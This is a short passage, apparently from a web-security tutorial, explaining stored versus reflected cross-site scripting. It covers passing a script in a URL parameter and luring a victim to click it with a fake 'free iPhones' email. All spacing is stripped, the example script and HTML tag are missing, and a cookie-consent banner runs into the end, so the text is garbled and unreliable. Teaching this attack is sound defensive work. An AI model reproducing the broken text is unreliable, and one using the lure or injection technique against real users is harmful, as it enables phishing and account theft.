Defense■script,whichwouldberunbythebrowser.Inthecaseofthepreviousexample,analertdialogboxwouldbedisplayedwiththewordwubbleinit.Whenitcomestoareflectedattack,thescriptisn’tstored.Instead,itisincludedinaURLyouwouldsendtoavictim.ThissortofURLwouldlooklikethis,andyoucanseethescriptpassedinasaparameter:http://www.badsite.com/foo.php?param=YouwouldsendthisURLtoavictimanddosomethingtogetthemtoclickit,suchassomethinglikesayingAppleisgivingawayfreeiPhonestothefirst1,000peopletoclickthislink.Thenyou’dmakethelinkrefertotheprecedingURL.YoucandothisinanHTMLemailusingthefollowingHTMLtag: Ourpartnerswillcollectdataandusecookiesforadpersonalizationandmeasurement.LearnhowweandouradpartnerGoogle,collectandusedata.AgreeCookies